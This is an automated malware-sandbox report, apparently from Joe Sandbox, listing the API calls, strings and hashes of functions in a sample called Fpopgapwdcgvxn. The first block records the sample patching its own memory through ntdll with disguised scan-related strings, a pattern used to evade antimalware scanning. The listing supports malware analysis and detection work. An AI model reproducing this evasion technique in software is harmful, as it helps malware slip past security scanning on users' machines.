                                                                                                    • Opcode Fuzzy Hash: 4c2c421cfc2bbefd1a7850dd52b57cd8b6a931f887a37ed13c2bba8b81df71d8
                                                                                                    • Instruction Fuzzy Hash: BB31C879514248BBDF00EF9CDC84EEA77ECAF4C3A4F148691B958CB295C774D9809B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,03330350,0330B47C,OpenSession,03330350,0330B47C,ScanBuffer,03330350,0330B47C,00000000,0330B464), ref: 0330AF5F
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0330AF65
                                                                                                      • Part of subcall function 032CFD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                      • Part of subcall function 032CFD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                      • Part of subcall function 032CFD40: GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                      • Part of subcall function 032CFD40: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                      • Part of subcall function 032CFD40: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                      • Part of subcall function 032CFD40: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                      • Part of subcall function 032CFD40: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess$AddressHandleLibraryMemoryModuleProcVirtual$CacheFlushFreeInstructionLoadProtectWrite
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                    • API String ID: 2787793100-4174081549
                                                                                                    • Opcode ID: 458bf2677642813dfcf529c7e6c868515af23c691bdf1e1e761e80499fcae63e
                                                                                                    • Instruction ID: 8b258872115fb743f29c11814856129e1f62f31bc13272016579e4f1cbe19074
                                                                                                    • Opcode Fuzzy Hash: 458bf2677642813dfcf529c7e6c868515af23c691bdf1e1e761e80499fcae63e
                                                                                                    • Instruction Fuzzy Hash: FCF11138A202189FDB14FBA5D9D0FCEB7B9EF44340F1180A5E144AF256DB70EE858B51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RectVisible.GDI32(00000000,?), ref: 032EFBBC
                                                                                                    • SaveDC.GDI32(00000000), ref: 032EFBDF
                                                                                                    • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 032EFC1F
                                                                                                    • RestoreDC.GDI32(00000000,00000000), ref: 032EFC4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$ClipIntersectRestoreSaveVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 1976014923-0
                                                                                                    • Opcode ID: f6f61e20dccdf9be0f5ee39e20a922feec740032bd05449bfe6bf1ee64f09daa
                                                                                                    • Instruction ID: 392b454ed66e6ed0839cd073bf248c1c502f63272f08a8ba8505ba26f5ba278c
                                                                                                    • Opcode Fuzzy Hash: f6f61e20dccdf9be0f5ee39e20a922feec740032bd05449bfe6bf1ee64f09daa
                                                                                                    • Instruction Fuzzy Hash: FB911674A10249AFDB04DFA8C585FEEBBF8AF08704F5940A4E904EB252D775E980CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 032FF15B
                                                                                                    • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 032FF179
                                                                                                    • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 032FF186
                                                                                                    • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 032FF193
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 032FF1A0
                                                                                                    • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 032FF1AD
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 032FF1BA
                                                                                                    • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 032FF1C7
                                                                                                    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 032FF1E5
                                                                                                    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 032FF201
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$EnableItem$System
                                                                                                    • String ID:
                                                                                                    • API String ID: 3985193851-0
                                                                                                    • Opcode ID: 313c49e9c89adff7db6b8cd284efb0d9489ddccdcc28967ae6050d332f119f6e
                                                                                                    • Instruction ID: 85fabdb81a8b3f486dec9aa3124d94d1915c9525f50b75f81a966582bc389326
                                                                                                    • Opcode Fuzzy Hash: 313c49e9c89adff7db6b8cd284efb0d9489ddccdcc28967ae6050d332f119f6e
                                                                                                    • Instruction Fuzzy Hash: C4213E793A4345BEE720EB24CD8DF9ABBE86B04B54F0440A0B6496F6D2C7F4E9C08754
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • Unexpected Memory Leak, xrefs: 032B295C
                                                                                                    • 7, xrefs: 032B273D
                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 032B28E5
                                                                                                    • An unexpected memory leak has occurred. , xrefs: 032B272C
                                                                                                    • bytes: , xrefs: 032B27F9
                                                                                                    • , xrefs: 032B28B0
                                                                                                    • The unexpected small block leaks are:, xrefs: 032B27A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                    • API String ID: 0-2723507874
                                                                                                    • Opcode ID: b4cdd8e2597479994a2be9851709b40ba6d1cb19d7da4938eef1818c14d6be8b
                                                                                                    • Instruction ID: 0b7ffc32775c1229e5ab566a515b80babdf882efa83b399e05c518ee8039d543
                                                                                                    • Opcode Fuzzy Hash: b4cdd8e2597479994a2be9851709b40ba6d1cb19d7da4938eef1818c14d6be8b
                                                                                                    • Instruction Fuzzy Hash: C871C634A24368CBDF21EA2CC884BD8B6F9EB0D780F1449E5D18DDB245DBB489C5CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA1C3
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA1DD
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA20B
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA221
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA259
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA271
                                                                                                      • Part of subcall function 032D2514: MulDiv.KERNEL32(00000000,00000048,?), ref: 032D2525
                                                                                                    • MulDiv.KERNEL32(?), ref: 032EA2C8
                                                                                                    • MulDiv.KERNEL32(?), ref: 032EA2F2
                                                                                                    • MulDiv.KERNEL32(00000000), ref: 032EA318
                                                                                                      • Part of subcall function 032D2530: MulDiv.KERNEL32(00000000,?,00000048), ref: 032D253D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 62d55de0d4e188b73f9b256e420affa46d3a52c05ec87d03101080e94fa94bb4
                                                                                                    • Instruction ID: 5b83fbd9611e52f87ffe6fa62fe7e4015bd6ac042591a9760c95162c70d3cfa3
                                                                                                    • Opcode Fuzzy Hash: 62d55de0d4e188b73f9b256e420affa46d3a52c05ec87d03101080e94fa94bb4
                                                                                                    • Instruction Fuzzy Hash: EA514C74618751AFC320EB69C845BAAFBF9AF45740F488C1DB9D5DB341C6B6E884CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 032CE97C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 032CE99A
                                                                                                    • GetClassInfoA.USER32(032B0000,03302748,?), ref: 03302B0B
                                                                                                    • RegisterClassA.USER32(0331B650), ref: 03302B23
                                                                                                      • Part of subcall function 032B669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 032B66CE
                                                                                                    • SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 03302BBF
                                                                                                    • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 03302BE1
                                                                                                    • SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 03302BF4
                                                                                                    • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,032F99F8), ref: 03302BFF
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,032F99F8), ref: 03302C0E
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,032F99F8), ref: 03302C1B
                                                                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,032F99F8), ref: 03302C32
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2103932818-0
                                                                                                    • Opcode ID: 413487e130b9f353cfd9fa6be57dee88d6da984f31790c591f3d676e085951dd
                                                                                                    • Instruction ID: ba748d6abd5569f0acd42d28642683c285449d57809feb0f09b3795cf1946709
                                                                                                    • Opcode Fuzzy Hash: 413487e130b9f353cfd9fa6be57dee88d6da984f31790c591f3d676e085951dd
                                                                                                    • Instruction Fuzzy Hash: 15418F74650340AFEB20FF68DCD1FAA73ACAB18740F5454A4F940DF2D6D6B5A8808B24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 032EB143
                                                                                                    • GetDCEx.USER32(?,00000000,00000402), ref: 032EB156
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032EB179
                                                                                                    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 032EB19F
                                                                                                    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 032EB1C1
                                                                                                    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 032EB1E0
                                                                                                    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 032EB1FA
                                                                                                    • SelectObject.GDI32(?,?), ref: 032EB207
                                                                                                    • ReleaseDC.USER32(?,?), ref: 032EB221
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$DesktopReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1187665388-0
                                                                                                    • Opcode ID: 60152969c72596b39cc23c460afb7a4e96cadd9de5f0c0ba128a20f77dc78231
                                                                                                    • Instruction ID: 02ffdefb125f4380200a6e9361380eb602846333ca050084d0f0d0f1f8b7bd75
                                                                                                    • Opcode Fuzzy Hash: 60152969c72596b39cc23c460afb7a4e96cadd9de5f0c0ba128a20f77dc78231
                                                                                                    • Instruction Fuzzy Hash: 5731E7BAA10219AFDB00DEECCC85DEFBBBCFF09640B444464B514FB240D6B5AD448BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(00000000,032BD297,?,?,00000000,00000000), ref: 032BD002
                                                                                                      • Part of subcall function 032BB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032BB8E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread
                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                    • Opcode ID: 2a9ea0af230894dafe7aca71c907a380edb5881a4ad805597eae21c6d7de0928
                                                                                                    • Instruction ID: 7e80d84c8a15617261615d75e6f45e7d94a7917b06cf77417b536913dba7b2a1
                                                                                                    • Opcode Fuzzy Hash: 2a9ea0af230894dafe7aca71c907a380edb5881a4ad805597eae21c6d7de0928
                                                                                                    • Instruction Fuzzy Hash: 29613F78B2028C9BDB00FBA4E880BDEB7B9DF88381F549835E5449F746CA74D9C59760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(?,?,?), ref: 032EE668
                                                                                                    • UnregisterClassA.USER32(?,?), ref: 032EE690
                                                                                                    • RegisterClassA.USER32(?), ref: 032EE6A6
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 032EE6E2
                                                                                                    • GetWindowLongA.USER32(00000000,000000F4), ref: 032EE6F7
                                                                                                    • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 032EE70A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                    • String ID: @
                                                                                                    • API String ID: 717780171-2766056989
                                                                                                    • Opcode ID: e6ac7c9d6ca54694cb59e217e1f1e9d6298de7083702e59fdd0f9014c2c01970
                                                                                                    • Instruction ID: 6c3463a4ae5f3e86df0924f99f21bd6293e96240a21041b35b2a963e13424f87
                                                                                                    • Opcode Fuzzy Hash: e6ac7c9d6ca54694cb59e217e1f1e9d6298de7083702e59fdd0f9014c2c01970
                                                                                                    • Instruction Fuzzy Hash: 29519E35A207188FDB20EF68CC85BDEB7F9AF44304F5449A9E959DB281DB70A984CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMonitorInfoA.USER32(?,?), ref: 032DB019
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 032DB040
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DB055
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DB060
                                                                                                    • lstrcpyA.KERNEL32(?,DISPLAY), ref: 032DB08A
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfo
                                                                                                    • API String ID: 1539801207-1633989206
                                                                                                    • Opcode ID: 11ad206c6aa411338fce254ba6233aba7974599288417c2d0806896b6e80b8d4
                                                                                                    • Instruction ID: 2603998756934e3d401bc1dea28abf3c8048acd7fe14d83a3bcbbc3086df0f67
                                                                                                    • Opcode Fuzzy Hash: 11ad206c6aa411338fce254ba6233aba7974599288417c2d0806896b6e80b8d4
                                                                                                    • Instruction Fuzzy Hash: F7110A71A283015FE720DF65A884BA7B7ECEF09712F054519ED5687240D7B0A4C4CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032B46CF,?,?,0332F7C8,?,?,0331A7AC,032B68FD,03319751), ref: 032B4641
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032B46CF,?,?,0332F7C8,?,?,0331A7AC,032B68FD,03319751), ref: 032B4647
                                                                                                    • GetStdHandle.KERNEL32(000000F5,032B4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032B46CF,?,?,0332F7C8), ref: 032B465C
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,032B4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032B46CF,?,?), ref: 032B4662
                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 032B4680
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                    • Opcode ID: b544485bb686a5cd032435b6eba7de8d1f23443c94782e26b94d6cc3bf6813d7
                                                                                                    • Instruction ID: 6f254c0ef3c19ef1871c01b8831573b9185bf9c7c87d1d351c527896f0f9208e
                                                                                                    • Opcode Fuzzy Hash: b544485bb686a5cd032435b6eba7de8d1f23443c94782e26b94d6cc3bf6813d7
                                                                                                    • Instruction Fuzzy Hash: CBF0246566139438EA20F2906CDAFED277C4744F65F188308F2B0980CBC7E4A0D08B21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 03305F47
                                                                                                    • ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 03305FE8
                                                                                                    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 03306035
                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0330603D
                                                                                                    • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 03306062
                                                                                                      • Part of subcall function 03305EC0: ImageList_GetBkColor.COMCTL32(00000000,?,03305F21,00000000,?), ref: 03305ED6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorImageList_$Draw$Text
                                                                                                    • String ID:
                                                                                                    • API String ID: 2027629008-0
                                                                                                    • Opcode ID: 8d3d0f399e559347689e618904e1cfe43bc33eecb9cf0b78bde457679a64346f
                                                                                                    • Instruction ID: 60d95b09d73e0a66741fa0a8ae433b5b9769f1570de2d7f8f78e8a3f57d55ab4
                                                                                                    • Opcode Fuzzy Hash: 8d3d0f399e559347689e618904e1cfe43bc33eecb9cf0b78bde457679a64346f
                                                                                                    • Instruction Fuzzy Hash: 90510379710205AFDB50FF68CDC1FAE37A9AF09700F144164FA14EF285CAB4E8818BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCapture.USER32 ref: 0330072D
                                                                                                    • GetCapture.USER32 ref: 0330073C
                                                                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 03300742
                                                                                                    • ReleaseCapture.USER32 ref: 03300747
                                                                                                    • GetActiveWindow.USER32 ref: 03300798
                                                                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0330082E
                                                                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 0330089B
                                                                                                    • GetActiveWindow.USER32 ref: 033008AA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 862346643-0
                                                                                                    • Opcode ID: 847b606e5ac757aea309139db8345f51ef8f2b04c346757d000acac816d17507
                                                                                                    • Instruction ID: 068e3a5ad06d026a35f4521d16b52ac2d1ee95c2a9e518f17972c14b6b42bc34
                                                                                                    • Opcode Fuzzy Hash: 847b606e5ac757aea309139db8345f51ef8f2b04c346757d000acac816d17507
                                                                                                    • Instruction Fuzzy Hash: 27513638A10344EFEB19EFA9C9D5B9DB7F9EF45700F5540A4E544AB2A1C774AE80CB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
